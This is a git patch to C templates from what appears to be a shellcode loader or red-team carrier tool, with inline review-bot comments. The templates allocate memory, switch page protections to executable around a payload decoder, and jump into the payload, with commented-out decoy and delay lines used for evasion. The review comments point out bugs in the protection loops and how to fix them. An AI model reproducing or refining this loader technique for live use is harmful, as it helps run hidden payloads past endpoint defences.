From 8ed47409a25df673500a7006f2b38c43a6b14d2e Mon Sep 17 00:00:00 2001 From: Dobin Date: Wed, 29 May 2024 08:29:22 +0100 Subject: [PATCH] refactor: template code --- data/source/carrier/alloc_rw_rwx/template.c | 5 ++++- data/source/carrier/alloc_rw_rx/template.c | 6 ++++++ data/source/carrier/change_rwx_rx/template.c | 16 ++++++++++------ 3 files changed, 20 insertions(+), 7 deletions(-) diff --git a/data/source/carrier/alloc_rw_rwx/template.c b/data/source/carrier/alloc_rw_rwx/template.c index 6a48f2f..c24caad 100644 --- a/data/source/carrier/alloc_rw_rwx/template.c +++ b/data/source/carrier/alloc_rw_rwx/template.c @@ -30,12 +30,15 @@ int main() } // Decoy - WinExec("C:\\windows\\system32\\notepad.exe", 1); + //WinExec("C:\\windows\\system32\\notepad.exe", 1); // Allocate 1 // char *dest = ... char *dest = VirtualAlloc(NULL, {{PAYLOAD_LEN}}, 0x3000, p_RW); + // Wait a bit + //sleep_ms(2000); + // Copy (and decode) // from: supermega_payload[] // to: dest[] diff --git a/data/source/carrier/alloc_rw_rx/template.c b/data/source/carrier/alloc_rw_rx/template.c index af93c81..458742f 100644 --- a/data/source/carrier/alloc_rw_rx/template.c +++ b/data/source/carrier/alloc_rw_rx/template.c @@ -29,10 +29,16 @@ int main() return 6; } + // Decoy + //WinExec("C:\\windows\\system32\\notepad.exe", 1); + // Allocate 1 // char *dest = ... char *dest = VirtualAlloc(NULL, {{PAYLOAD_LEN}}, 0x3000, p_RW); + // Wait a bit + //Sleep(2000); + // Copy (and decode) // from: supermega_payload[] // to: dest[] diff --git a/data/source/carrier/change_rwx_rx/template.c b/data/source/carrier/change_rwx_rx/template.c index b85bab9..5251a73 100644 --- a/data/source/carrier/change_rwx_rx/template.c +++ b/data/source/carrier/change_rwx_rx/template.c 
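Review bot: In alloc_rw_rwx/template.c the decoy call and the delay are left as commented-out code, and the alloc_rw_rx hunk adds the same dead lines, with nothing saying why they are disabled or when they should be re-enabled. The two templates also disagree on the disabled delay, `//sleep_ms(2000);` here versus `//Sleep(2000);` in alloc_rw_rx. No definition of `sleep_ms` is visible in the hunk, so uncommenting that line may not compile. Either delete the dead lines or keep one spelling and record the reason in the comment, e.g. `// Decoy (disabled: <reason>)`. main's body starts and ends outside both hunks.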
@@ -22,15 +22,19 @@ int main() // Note: RWX if carrier and payload are on the same page (or we cant exec copy..) // can do only RW otherwise? - if (VirtualProtect(dest, {{PAYLOAD_LEN}}, p_RWX, &result) == 0) { - return 16; - } + for(int n=0; n<({{PAYLOAD_LEN}}/4096)+1; n++) { + if (VirtualProtect(dest + (n * 4096), 16, p_RWX, &result) == 0) { + return 16; + } + } {{ plugin_decoder }} - if (VirtualProtect(dest, {{PAYLOAD_LEN}}, p_RX, &result) == 0) { - return 17; - } + for(int n=0; n<{{PAYLOAD_LEN}}/4096; n++) { + if (VirtualProtect(dest + (n * 4096), 16, p_RX, &result) == 0) { + return 16; + } + } // Execute *dest (*(void(*)())(dest))();
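Review bot: The second loop iterates `{{PAYLOAD_LEN}}/4096` times while the first iterates `({{PAYLOAD_LEN}}/4096)+1`, so the last page switched to p_RWX is never switched back to p_RX; for a payload under 4096 bytes the second loop does not run at all and the region stays writable and executable. The bounds should match, `for(int n=0; n<({{PAYLOAD_LEN}}/4096)+1; n++) {`, and the second failure path should keep its own exit code, `return 17;`, which the old code used to tell the two VirtualProtect failures apart. Stepping from `dest` in 4096-byte strides with a 16-byte length also covers the same pages as the old single call over {{PAYLOAD_LEN}} only if `dest` is page-aligned, which cannot be confirmed here because `dest` is set outside the hunk. Since the commit is labelled a refactor, this behaviour change deserves a comment above the loops or a commit of its own.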